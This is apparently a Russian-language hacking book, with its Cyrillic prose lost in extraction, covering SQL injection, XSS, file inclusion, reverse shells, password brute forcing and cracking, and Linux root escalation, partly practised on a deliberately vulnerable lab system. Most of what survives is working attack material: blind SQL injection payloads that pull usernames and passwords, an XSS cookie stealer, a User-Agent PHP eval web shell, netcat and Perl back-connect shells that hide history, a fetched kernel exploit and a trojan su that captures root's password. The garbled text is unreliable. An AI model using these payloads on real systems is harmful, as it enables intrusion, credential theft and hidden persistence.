exit ();
} else {
... //
}



- = 0

, ,

57

58

05. SQL-

(
, ). ,
(, ),
, .
(CMS),
.
, ( ,
sha1 , md5 ). , SQL , ,
, ,
.


,
. ,
mysql:
http://www.site.net/module.php?id=-1 union select 1,2,user(),4 --


ERROR 1267 : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_
general_ci,SYSCONST) for operation 'UNION'

, , ,
latin1_swedish, , user(),
utf8_general. MySQL ,
, UNION .
, latin1 user()
convert():
convert(user() using latin1)

:
http://www.site.net/module.php?id=-1 union select 1,2, convert(user() using
latin1),4 --

.
SQL-
MySQL, SQL- MS SQL 5.

58

06

(Cross-Site Scripting, XSS)


,
- .
XSS, CSS,
, , CSS
(Cascade Style Sheets), . X XSS
, (- cross), , , , .
XSS HTML/
JavaScript/VBScript- ,
.
,
, .
: .
.
, ,
. XSS,
.

XSS
cookie-
.
cookie ( )? , .
cookie-

59

60

06.

. cookie- , ,
,
.

Hacked by V.Pupkin. XSS. , ( ).
,
JavaScript VBScript.
- . , ,
, . , XSS-
XSS-. ,
.


, -
XSS. XSS
, - , . -
, .
, .
.
, , ,
search, .
.
:
script.php?search=[ ]

, html-
, :
script.php?search=<b>Hacked</b>

, , Hacked. , <marquee> </marquee>,


, <h1> </h1>, . ,
. .
, ,

60

61

- - .
<b>Hacked</b> cookie (
). , ,
,
(%3c , %3e ):
script.php?search=%3cmarquee%3eHacked%3c/marquee%3e

, GET:
script.php?search=<b>Hacked</b>

,
POST, . html, POST .
, javascript-,

.



html-. ,
XSS-. ,
, html-, . XSS-
.

. , , .
,
, ( ) .

( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>, XSS

Hacked by
Vasya!

61

62

06.

XSS- ; ,
, ,
, , .

-,
XSS
-, XSS.
name.php :
<?php
$name=$_GET['name'];
echo "Your name is $name";
?>

/usr/local/apache/htdocs.
form.html :
<form action="name.php" method="GET">
<input type=text name="name">
<input type=submit value="OK">
</form>

OK
(name) name.php.
http://localhost/form.html (. 06.1), (, Vasya)
OK.

. 06.1. form.html

name.php , . 06.2.
, form.html
<h1>Hacked<h1>, Hacked, . 06.3.

62

-, XSS

63

. 06.2. name.php

. 06.3. name.php html-

, html- ( <h1> </h1>,


) ,
-, name.php.
: JavaScript. form.html
<script>alert('Hacked by Vasya')</script>

<script> </script> (), alert() .


, , OK, ,
. 06.4.
( Location)
, ,
( ). , - . ( ,

63

64

06.

. 06.4.

.)
cookie-.
cookie,
<script>alert(document.cookie)</script>

Damn Vulnerable Linux ,


cookie, - . 06.5.

. 06.5. cookie

, , cookie-
, . jvsript-, cookie- php- (
php-), , , . -,
php- cookie.
( DVL ),
.
<?
$query = $_SERVER['QUERY_STRING']; //
// cookie, JavaScript'
$query .= "\n";
//
$db="/tmp/cookies.txt";
// ,
// cookie
$fh=fopen ($db, "a+");
// ,

64

-, XSS

fputs ($fh, "$query");


fclose ($fh);
?>

//
//
//
//

65


( cookie )
cookie

php- cookie-
cookies.txt.
, .
/usr/local/apache/htdocs steal.php. Cookie-
/tmp, , /usr/local/apache/htdocs nobody,
-, . , nobody.
jvsript- :
<script>document.location.replace('http://_/_.php?com='+document.
cookie);</script>

:
 document.location.replac cookie-
;
 'http://_/_.php ;
 ?com='+document.cookie com
cookie-, ,
? ( QUERY_STRING),
cookie-, , com=. cookie
, .
cookie- -
cookies.txt.
form.html :
<script>
document.location.replace('http://localhost/steal.php?com='+document.cookie);
</script>

OK ,
steal.php. /tmp
cat cookies.txt cookies.txt cookie-
(. 06.6).

base64, .
. . , ,
- . .

65

66

06.

. 06.6. cookie-

, cookies.txt cookie- . (,
- md5-, 03,
, 0). cookie- , IE ( Internet
Explorer), Opera Firefox.
, , .
( ), , (
, html-).

. , , ,
, , , , , .

, ,
( , ) . ,
, ,
() , ( ). - !
... ,
, html- .
, -
, .
XSS html- .
:

66

<script>

67

function ShowPage(){
// page <html>
var page=document.getElementById("html");
// CodeOfPage
var CodeOfPage=page.innerHTML;
// alert()
alert(CodeOfPage);
}

, , //, .


<script>
, <script> ?
<script> .
, , XSS. , javascript (
vbscript).
(alert),
.
, ,
:
 , ;
 , Internet Explorer.
, .
 <META>. ,
. <META> refresh, CONTENT
:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

 <BODY>. :
<BODY BACKGROUND="javascript:alert('XSS')" >

OnLoad, .
javascript- :
<BODY ONLOAD=alert('XSS')>

 <IMG>. SRC:
<IMG SRC="javascript:alert('XSS')">

, javascript ? :
<IMG SRC="javascript:alert('XSS')">

67

68

06.

:
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="
javascript:alert('XSS');">

VBScript:
<IMG SRC='vbscript:msgbox("XSS")'>

 <STYLE>. IE , ,
:
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

, Internet
Explorer.
 <TABLE> . .
BACKGROUND, . , javascript-:
<TABLE BACKGROUND="javascript:alert('XSS')">

 <DIV>. . ,
<div> </div>, .
:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

, url() expression():
<DIV STYLE="width: expression(alert('XSS'));">

 <STYLE>. ,
<STYLE> </STYLE>. :
<STYLE>.XSS{background-image:url(
"javascript:alert('Hacked')");}</STYLE><A CLASS=XSS></A>

XSS ( XSS-),

<A CLASS=XSS></A>

:
<STYLE> type="text/css">BODY{background:url(
"javascript:alert('Hacked')")} </STYLE>

XSS- .
 <BGSOUND>. , javascript-:
<BGSOUND SRC="javascript:alert('XSS');">

 <IMG> . .
, Internet
Explorer. DYNSRC LOWSRC.
:

68

<script>

69

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

SRC ,
.
 <OBJECT>. html-.
javascript- :
<OBJECT TYPE="text/x-scriptlet" DATA=
"http://www.site.com/test.html"></OBJECT>

, .
.
.
. , XSS .
XSS:
 javascript- ;
 VBScript-;
 ( );
 XSS- <IMG> Firefox.

69

07

SQL-

SQL- MySQL,
MS SQL . , .
, , SELECT UNION,
.
, MySQL,
. ,
.
( -- /*),
,
. , INSERT
(. ), , .
, , ,
. ,
,
. , , ,
.
:
http://site.com/news.php?id=12

,
. , :
news.php?id=12 and 1=1

, .
:
news.php?id=12 and 1=2

, .
, , ,
, ,
.
, .
, :

70

mysql.user

71

news.php?id=12' and 1='1


news.php?id=12' and 1='2

.
, ,
1=2, , 1=1.
.
, ( 1=1),
( 1=2). ,
, , , ,
, .
, .

MySQL
@@version
MySQL.
, MySQL .
:
news.php?id=12 and substring(@@version,1,1)=4

@@version
(=4). , , , 1=2. , 4 5 .
, , MySQL5.
4 5 , 3. , MySQL3,
- ,
SELECT UNION .

@@version version().


mysql.user
, , , select :
news.php?id=12 and (select 1)=1

71

72

07. SQL-

, .
, , mysql.user:
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1

mysql.user, 1, ,
, . ,
, , mysql.user,
MySQL load_file()
OUTFILE. , limit 0,1,
;
.
limit.


MySQL5,
information_schema ,
.
,
users:
news.php?id=12 and (SELECT 1 from users limit 0,1)=1

users, .
, .
MySQL4,
.



- , . , users
,
:
news.php?id=12 and (SELECT substring(
concat(1,password),1,1) from users limit 0,1)=1

'1' password,
substring ( ), ,
1, password .
password, .

72

73


/
,
, , , SQL-.
(username) (password) users. , , username, password,
email userid.
(username) (password) where:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>100

limit 0,1,
,
, . , ,
. , select substring(,1,1),
. ascii()
ASCII-, > 100.
ASCII- , 100,
.
, , 100
:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>80

, , 80. :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>90

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>85

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>86

, , . ,
85, 86, 86! , =86. , ASCII- ( char(86)), ,
V. , substring:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>100

73

74

07. SQL-

substring ,1,1 ,2,1,


select.
, . >100 , :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>120

, 110:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>110

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>105

:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>103

. :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>104

, , 104 105,
105. char(105) i.
Vi. , 11
. .
( substring) , ,
, >0 . , , user/password .

SQL- NaboPoll
Damn Vulnerable Linux NaboPoll ( ), results.php
, SQL-. :
27...31
-------------------------------$res_question = mysql_query("select * from nabopoll_questions
where survey=$survey order by id");
if ($res_question == FALSE || mysql_numrows($res_question) == 0)
error($row_survey, "questions not found");

$survey () , SQL-. ,
where .

74

SQL- NaboPoll

75

. http://localhost/webexploitation_package_02/
nabopoll/admin/survey_edit.php , . 07.1

. 07.1. NaboPoll


Actions ().
, ( ),
( Actions).
, 1
, . 07.2. (
http://localhost/webexploitation_package_02/nabopoll/result.php?surv=1).

surv=1 :
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),1,1))>125),1,0)))

SQL-
NaboPoll. .
(/**/), , . - SELECT AND
1=, SELECT IF. IF (1),
, (0), . ,
IF , AND 1=1,
( ). ,
AND 1=0, ,
survey not found ( ). IF : ASCII- MySQL (

75

76

07. SQL-

user) ( ) . , 125,
(. 07.3), , .

. 07.2. NaboPoll

. 07.3. NaboPoll

76

SQL- NaboPoll

77

, , , 100,
( ).
, , 114. r.
( SUBSTRING
2):
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),2,1))>114),1,0)))

, 111
( o).
, http://
packetstormsecurity.org/0702-exploits/nabopoll-sql.txt . , (
<?), , (
, . 07.4). $survey 1,
$path :
/webexploitation_package_02/nabopoll

. 07.4. NaboPoll

nabopoll.php, , /tmp php nabopoll.php.

77

78

07. SQL-

,
MySQL (. 07.5).

. 07.5. NaboPoll

, , MySQL root@localhost.
, SQL-
: 0 255. ( , ),
.
, , , , ,
. .
, load_file(), ,
, /etc/passwd.
user() :
load_file(0x2f6574632f706173737764)

. 07.6. ,
,
.
, 100 195 .
,
100 15 , 13 .
6.
MD5-,
(
, ,
). 09 af.
.
- 8.

78

79

. 07.6. NaboPoll



site.com
news.php. , sqlmap 4, 5 .
.
sqlmap,
:
./sqlmap.py -u "http://site.com/news.php?id=12" -p id
-a "./txt/user-agents.txt" -v1 --string "Posted 33-2008" -e "(
SELECT concat(username,0x3a,password) from users where userid=2)"

-u , , -p , ( id). -a
(
user-agent = sqlmap, ). -v1 . --string ,
, . , 1=1
1=2 ,
. -e , , , SELECT .
sqlmap 5 , . sqlmap
(), mysql5,
. e,

79

80

07. SQL-

( mysql4
):
./sqlmap.py -u "http://site.com/news.php?id=12" -p id
-a "./txt/user-agents.txt" -v1 --string "Posted 33-2008" -e "(
SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from
information_schema.columns where column_name like 0x257061737325
limit 0,1)"

sqlmap , magic_quotes,
0x257061737325 ( '%pass%', ).
limit, . ,
sqlmap ,
.


, SQL-, . ,
: Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in /home/site/public_html/detail.php on line 377,
, . ( ,
, id) id=29 and 1=1,
, id=29 and 1=2,
.
( 29)
, .
Google, :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource.
site:fr,site:uk . .
, SQL- ,
. , ,
select , ,
. ,
.
,
, /etc/passwd:
id=29 and 1=(SELECT/**/ (IF((ASCII(SUBSTRING(
load_file(0x2f6574632f706173737764),1,1))<=255),1,0)))

80

81

( ),
,
. NaboPoll, (
, 6).
( 90% ),
, . user(), database(),
version() @@version_compile_os. , .



, , ,
,
.
, , SELECT,
INSERT ( ) UPDATE ( )
?
, , ,
. MySQL benchmark(),
PostgreSQL pg_sleep(), MS SQL delay().
benchmark() - .
- ,
. ,
. ,
sql-:
INSERT INTO table VALUES ('aaa', 'bbb', '[sql]', 'xxx');

table 'aaa', 'bbb', 'sql' 'xxx'.


sql ,
sql-. select
( ):
INSERT INTO table VALUES ('aaa', 'bbb', '[ ' OR 1=if(ascii(lower(substring(
(select user from mysql.user limit 1),1,1)>0, benchmark(
999999,md5(now())),1), 'hacked') /* ]', 'xxx');


if, , ,
benchmark, 1.
select
mysql.user, ,

81

82

07. SQL-

, ASCII-, 0. , benchmark
( benchmark 999 999 MD5-
). xxx ,
(/*), hacked.
, 255:
INSERT INTO table VALUES ('aaa', 'bbb', '[
' OR 1=if(ascii(lower(substring((
select user from mysql.user limit 1),1,1)>255, benchmark(
999999,md5(now())),1) ), 'hacked') /* ]', 'xxx');

,
, .
,
.
, , ,
.
benchmark :
 benchmark . .
 .
32- .
 .
 benchmark ( 999 999)
. .
 benchmark , 50
.
, .

82

08


PHP-

/proc/self/environ
, (http://site.com) php-,
.
, /
, Apache , /tmp
. ?
.
/proc/self/environ. php- , . *nix /proc, /proc/
self ,
.
- /proc/self/environ,
. ,
Apache, /proc/self/environ.
user-agent ( -).
/proc/self/environ, user-agent, :
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4)
Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=150
...

user-agent <?php eval($_GET[cmd]); ?>


curl:
curl "http://site.com/index.php?page=../../../../../../../../proc/
self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

phpinfo() . /proc/self/environ user-agent :

83

84

08. PHP-

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
<?php eval($_GET[cmd]); ?> HTTP_KEEP_ALIVE=150
...

, user-agent
( /proc/self/environ
).

Apache
access_log error_log? ,
, . /proc Apache.
:
 id :
/proc/%{PID}/fd/%{FD_ID}

%{PID} ( , /
proc/self/status), %{FD_ID} ( 2
7 Apache).
:
http://site.com/index.php?page=../../../../../../../../proc/self/status

, %{PID} 1228, :
curl "http://site.com/index.php?page=../../../../../../../../proc/
1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

 , id , self:
curl "http://site.com/index.php?page=../../../../../../../../proc/
self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

, self ,
id . (
Apache)
.


,
. ,
Secteam
.

84

85

- , - . .
. *nix .
e-mail :
1. - .
2. - (, ),
, php-, .
3. wwwrun@localhost,
wwwrun , http- (
www-data, nobody, www, apache, wwwdata . .).
/var/mail ( /var/spool/mail)
, http-.
curl:
curl "http://site.com/index.php?page=../../../../../../../../var/mail/
wwwrun&cmd=phpinfo();"

, , ( -
).

85

09

CRLF-

CRLF- , , ,
. ,
:
[00:20:33] <Admin> !
[00:20:40] <Lapochka> , Admin!

(, Alex)
(%0a) :
, !%0a[00:20:51] <Admin> , Lapochka!

:
[00:20:33]
[00:20:40]
[00:20:49]
[00:20:51]

<Admin> !
<Lapochka> , Admin!
<Alex> , !
<Admin> , Lapochka!

(, FlyLinkDC++)
%0a Ctrl+Enter ( Codehunter aka Born
Dragon).

86

III
?












0A.
0B.
0C.
0D.
0E.
0F.
10.
11.
12.
13. IT-

87

0A


(). ? ,

(root).
, ,
0D -. , -,
-, 05.
, ,
netcat ( nc).
Unix ( Linux). , -e,
( ),
DVL .
netcat :
nc -l -n -v -p 25

-p (25),
.
. -v (verbose )
-vv (very verbose ).
netcat :
nc -e

/bin/sh

IP_ 25

(back connect)
. ,
/bin/sh. IP- 127.0.0.1,
:
nc -e

/bin/sh

127.0.0.1 25

, (connect), ,

88

89

. , netcat
,
nc+-e+/bin/sh+127.0.0.1+25

, . , ,
netcat .
, Damn Vulnerable Linux , . 0.1.
( ).

. 0.1. netcat


nc -l -n -vv -p 25

Enter
listening on [any] 25 ...

, netcat 25.

su nobody

Enter. root nobody. , ,

89

90

0A.

,
nobody. netcat:
nc -e

/bin/sh

127.0.0.1

25

Enter . :
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]

, netcat (
) netcat ( ).
id , ,
nobody, root. uname -a .
- exit
Ctrl+C.
, - netcat -e?
, ; -
(back connect shell), Google, back connect
shell download. ,
( ),
, . , -
mypage .
backconnect.txt. ( ,
!) , , wget :
wget -O /tmp/bc.pl http://mypage.narod.ru/backconnect.txt

-O ( O , *nix-, Windows,
).
/tmp bc.pl.
curl ftp. curl :
curl -o /tmp/bc.pl http://mypage.narod.ru/backconnect.txt

,
:
chmod 755 /tmp/bc.pl

, /tmp/bc.pl : IP- , ,
. :
/tmp/bc.pl 127.0.0.1 25

90

91

- Perl, . http://
otaku-studios.com/showthread.php/72978-Perl-Backconnect . :
#!/usr/bin/perl
use IO::Socket;
$system
= '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable
to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable
to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-");
system($system);
#EOF

Kate, ,
( ) /tmp bc.pl.
, .
, , su nobody.
, .
:
chmod 755 /tmp/bc.pl

, , (
Enter):
nc -l -n -vv -p 25

:
/tmp/bc.pl 127.0.0.1

25

91

92

0A.

. 0.2. IHS Back-Connect

(. 0.2).
, - (uname -a, id pwd) .
:
unset HISTFILE
unset SAVEHIST

.
.bash_history.
,
. .
, , ,
(backdoor , , ). ,
, ,
. ,
.
/tmp sticky-,
drwxrwxrwt .

92

93

. - ( root) ,
drwxrwxrwx. find:
find / -type d perm -0777 print > /tmp/.file &


/tmp/.file.

93

0B

02
/etc/passwd, ().
,
. ( ) (brute force ).
, .
( ), , , 13% , .
/etc/passwd
( )
(
)
user1:user1
user2:user2
...
userN:userN

Windows,
Brutus AET 2 (http://www.hoobie.net/brutus).
, - PuTTY ( Windows). PuTTY
. ,
,
, PuTTY (. 0B.1). Linux
nc.
21 (FTP ), 110 (POP3
), 23 (telnet), 22 (SSH SSH). , Brutus SSH,
BruteSSH Linux Back Track 4.
PuTTY SSH,
IP- (Host name (or IP-address))
www.site.com, .

94

95

. 0B.1. PuTTY

(22). (Connection type) SSH. Open () . login as:, ,


SSH .
, . 127.0.0.1. ,
, .
21, 25, 110,
Port, Connection type Raw.
Open. ,
- , ,
.
Brutus (. 0B.2). ,
, (Type).
, 21 (FTP). FTP.
root , - ,
, , root FTP . , , . Pass Mode (
) Combo List Combo File
:.

95

96

0B.

Brutus example-combo.txt. , Target


. Start. , (, , ,
) Positive Authentication Results
( ).

. 0B.2. Brutus

, .
(Morris and Grampp).
, 20 .
200. 200
.
( ). Brutus
words.txt.
-. (, , , , ). (,
, , , . .).

96

97

Pass Mode Word List, User File Pass File ,


, .
Brutus , FTP- Windows.
TYPSoft FTP Server. http://soft.mydiv.net/
win/files-TYPSoft-FTP-Server.html.
, ftpserv.
exe. , SetupFTP, (Language russian), .
SetupUsers ()
midnight 12345 (. 0B.3).

. 0B.3. TYPSoft FTP Server

Brutus combo.txt,
example-combo.txt,
(midnight:12345). Brutus,
. 0B.4, Start.
FTP ( ).
Main FTP- , Brutus
(. 0B.5).
. , TYPSoft FTP Server users.ini
md5- ,
, .

97

98

0B.

. 0B.4. combo.txt. !

. 0B.5. TYPSoft FTP Server

98

99

FTP.
, FTP-. ,
, Total Commander
, . Total Commander
( )
. . ,
(deface ) .
index.html index.php index.old,
index.html ,
- ,
. , ,
, ,
, .
FTP PuTTY. localhost, 21
(Connection type) Raw.
FTP- , (. 0B.6).

. 0B.6. FTP- PuTTY

22,
SSH ( ).
PuTTY ( Windows), ssh ( Linux).
, /etc/passwd /bin/bash /bin/sh, - /sbin/nologin /
bin/false ( ,
). ,
. 21 (FTP)
, 110 (POP3 ),
Brutus , POP3
, FTP.

99

100

0B.

Brutus -.
Use Proxy Define -,
(. 0B.7). - , .

. 0B.7. - Brutus

BruteSSH,
SSH. Back Track 4 root toor.
:
/etc/init.d/networking start

, startx .
,
. , . toor.
/pentest/passwords/brutessh aa.txt.
BackTrackPrivilege EscalationPasswordAttacsOnlineAttacsBruteSSH
BruteSSH.
. :
./brutessh.py -h 127.0.0.1 -u root -d aa.txt

, root,
. 0B.8.
Back Track 4 9
, , Hydra Medusa. , SSH, .
, ,
Xhydra (HydraGTK) . Hydra

100

101

. 0B.8. BruteSSH

. 0B.9. Medusa

, .
Windows.
Medusa . 0B.9.
.

101

0C

*nix-
Unix
John The Ripper (www.openwall.com). .
? -, (,
PC-Linux) /etc/passwd,
. -, , ,
/etc/shadow. -,
/etc/shadow , , .
-,
( )
, root.
JTR (John The Ripper -)
Unix- , Windows.
Back Track 4, Windows
.
unshadow /etc/passwd /etc/shadow.
/etc/passwd, .
:
unshadow -passwd -shadow > -

:
root: JhAraBYwfjR3.:0:0:root:/:/bin/bash
mac:GGCfyAEua5zUc:11001:11001:service-myserver.com POP:/home/mac:/bin/sh
pincher:ySb4B8nseVzEo:11002:11002:Pitch:/home/pincher:/bin/sh
luis:O04IBHwrKKVEA:11003:11003:thisserver.com POP:/home/luis:/bin/sh

passwd, ( Windows john john-mmx)


john passwd

102

*nix-

103

, Ctrl+C. john.rec ( ).
10 .
,
john --restore

,
john --show passwd

john.pot,
.
, , .
john single (). .
,
/etc/passwd: ,
, . ,
, ,
ed, s, . .
john :
john --single users.txt

users.txt . pincher pitched.


. : password.lst.
:
john --wordlist=password.lst users.txt

, , --rules:
john --rules --wordlist=password.lst users.txt

, . ,
, . , , .
richard, luis. ,

:
john --incremental:alnum users.txt

alnum ( ).
( --incremental) all (--incremental:all),

103

104

0C.

, .
(digits),
(alpha).
, . mac
titanic.
.
(-) ( ).
--users=[-]LOGIN|UID[,..]


.
--groups=[-]GID[,..]

( ) .
--shells=[-]SHELL[,..]

[
()].
Unix (
DES). 2 salt (). , .
, , Solaris
( SunOS).
( Linux FreeBSD)
DES , , .
FreeBSD Linux MD5.
$1. JTR FreeBSD MD5
hash. Linux . , BlowFish $2.
John The Ripper
.
,
(John ).
Ubuntu Linux (Back Track 4)
SHA-512, $6, John .
FreeBSD MD5
, . -
JTR (
3500 ),
. MD5 ,

104

LDAP-

105

15 ,
Unix- 8 .
JTR Unix-,
DES, ,
. , ,
-, John
,
. ,
, ,
8- , 4-,
.
*nix- JTR
MySQL, MS SQL, Oracle . . 40 .
? (
1520 ) .
.
, .
, . , Linux-
3 , , ,
.

LDAP-
LDAP *nix-. root
/etc/paaswd /etc/shadow, LDAP.
. *nix- base64.
ldap2pw John The Ripper (http://www.openwall.com/lists/john-users/2008/02/11/1).
, :
#! /usr/biun/perl -w
use strict;
use MIME::Base64;
while( <> && ! eof) {
# need eof since we will hit eof on the
other <>
chomp;
my( $uid, $passw, $cn, $dn);

105

106

0C.

$cn = $uid = '';


while( <> ) {
# get an object
chomp;
last if /^\s*$/;
# object have blank lines between then
if( /^cn: (.+)/ ) {
$cn = $1;
}
elsif( /^dn: (.+)/ ) {
$dn = $1;
}
elsif( /^userP\w+:: (.+)/) {
$passw= substr( decode_base64($1), 7);
# assuming {crypt}
}
elsif( /^uid: (.+)/) {
$uid = $1;
}
}
print "$uid\:$passw\:\:\:$cn\n" if defined $passw; # only output
if object has password
}

root
ldap search, ldap2pw,
ldap.pw:
ldapsearch -D "<dn for root>" -w xxxxxx -b "<base dn for users>" ""
userpassword uid cn | ldap2pw > ldap.pw

ldap.pw John.

MD5-
, , Windows
MD5- MD5Inside, InsidePro (. 0C.1).
4
. , . ,
- . InsidePro
PasswordsPro, ,
.
MDCrack
(21 ), http://mdcrack.openwall.
net. .
( CUDA).
. MD5 (World Fastest MD5 Cracker)
BarsWF (http://3.14.by/ru/md5). GeForce GT220

106

MD5-

107

. 0C.1. MD5Inside Inside Pro

153155 , 3538 .
183184 (. 0C.2).

. 0C.2. BarsWF

BarsWF , (,
http://hash.insidepro.com/index.php?lang=rus).

107

108

0C.


, :
barswf_cuda_x32 -h 1b0e9fd3086d9a159a1d6cb86f11b4ca c 0aA~

.
Rainbow Tables ( )
MD5-, .
. .
, root. , , , .
ssh T su.
nobody,
.
expect, . expect (
), bruteforce.exp,
su.
(
&) , . ,

su.

108

0D

*nix- (root). - privilege escalation, privilege


elevation (, , ).
, () -
. Linux ,
(kernel) . ,
Linux (, Ubuntu, Fedora Red Hat)
.
Damn Vulnerable Linux.
exploit-db.com.
Milw0rm, ,
. Damn Vulnerable Linux /pentest/exploits/milw0rm Milw0rm,
2007 , .
( platforms), ( local remote), ,
( ports). exploit-db.
com , Milw0rm.
nobody ( su nobody), . 0D.1,
/tmp ( cd /tmp).
. uname -a . ,
Linux 2.6.20. ,
. Google Linux kernel 2.6 local root
exploit ( 2.6 root).
Linux kernel 2.6 Local Privilege Escalation.
exploit-db.com ,
, , ,
, .

109

110

0D.

. 0D.1. vmsplice qaaz

Linux kernel
2.6.17 2.6.24.1 vmsplice Local Root Exploit ( www.
exploit-db.com/exploits/5092/). 2008
qaaz. jessica_biel_naked_in_my_bed ( ) ,
. .c ,
. Kate /tmp ex.c, ,
,
:
wget -O /tmp/ex.c http://www.exploit-db.com/download/5092

.
. (kernel exploits)
-static, .
Linux C gcc (GNU C Compiler).
cc (C Compiler).
:
gcc -static -W -n -o ex ex.c

-o ( ex). (ex.c) . (. . 0D.1),


, (warning)
(error) . ( ./ex) , : $

110

111

#, . id ,
root (uid=0).
. !
,
Linux.
2.4.17 newlocal, kmod, uselib24;
2.4.18 brk, brk2, newlocal, kmod;
2.4.19 brk, brk2, newlocal, kmod;
2.4.20 ptrace, kmod, ptrace-kmod, brk, brk2;
2.4.21 brk, brk2, ptrace, ptrace-kmod;
2.4.22 brk, brk2, ptrace, ptrace-kmod;
2.4.2210 loginx;
2.4.23 mremap_pte;
2.4.24 mremap_pte, uselib24;
2.4.251 uselib24;
2.4.27 uselib24;
2.6.2 mremap_pte, krad, h00lyshit;
2.6.52.6.8 krad, krad2, h00lyshit;
2.6.85 krad2, h00lyshit;
2.6.9 krad, krad2, h00lyshit;
2.6.934 r00t, h00lyshit;
2.6.10 krad, krad2, h00lyshit;
2.6.132.6.16 raptor, raptor2, h0llyshit, prctl;
2.6.172.6.24.1 vmsplice;
2.62.6.19 (32bit) ip_append_data() 0x82-CVE-20092698;
2.6.30 +/SELinux/RHEL5 Test Kernel Local Root Exploit 0day;
2.6.31 perf_counter (x64);
2.6.12.6.32-rc5 Pipe.c.
- - ( ),
root -,
.
SSH - .
, .
, , /bin/sh,
system ("chmod 4755 /tmp/hack");

111

112

0D.

root chmod 4755 suid ( 4) /tmp/hack .


hack.c :
int main () {
getuid(0);
getgid(0);
file = fopen ("/tmp/cmd", r);
cmd = fgets (file);
fclose(file);
system(cmd);
}

/tmp/cmd ,
/tmp/hack suid, . /tmp /tmp/evil.

, , /tmp/
cmd. ? ,
root,
( do_brk).
, , ,
/tmp/cmd
iptables t nat nvL

, ,
iptables F

.
iptables ( )
- PHP- suid,
root.
,
(0-day) ( ) ,
, .
. /bin/sh, . :
#!/bin/sh
alias "/bin/sh" "chmod 4755 /tmp/evil"

. /bin/sh root
chmod.
root
Back Track 4. (2.6.30),

112

113

, , root.
, . , - ?
, root?
,
. , .bash_history, ,
su (switch user), . su
, .
:
mkdir .elm

, .ssh ,
.
( ) .bashrc, :
PATH=$HOME/.elm:$PATH

.elm. , su
( ), su ,
/bin, . su.c,
FA-Q 1999 , http://www.
packetstormsecurity.org/trojans/index7.html.
:
/* su trojan ribbed by FA-Q
* werd to lwn for his help.
* mkdir .elm
* cc -o ~/.elm/su su.c
* edit .bash_profile or .bashrc
* add PATH=$HOME/.elm:$PATH
*/
#include <stdio.h>
#include <stdlib.h>
#define SU_PASS "/tmp/.rewt"
main (int argc, char *argv[])
{
char *key;
char buf[24];
FILE *fd;
key = (char *)getpass ("Password:");
fd = fopen(SU_PASS,"w");
fprintf(fd, "pass: %s\n", key);
fclose(fd);
printf ("su: incorrect password\n");
sprintf(buf, "rm %s", argv[0]);
system(buf);
exit (1);
}

113

114

0D.


cc -o ~/.elm/su su.c

, . ? /tmp/.rewt,
, , .
,
, su.
, su.
, /tmp/.rewt. , , , - .
. :
sprintf(buf, "rm %s", argv[0]);

:
sprintf(buf, "rm /home/user/.elm/%s", argv[0]);

rm su. (, DVL) su: incorrect password


, , : Sorry.
DVL , BackTrack 4
(. 0D.2).

. 0D.2. su

114

115

uri (home/uri).
su root /tmp.
, su
bash su - /home/uri/.elm,
. , , ,
. su : /bin/su. ,
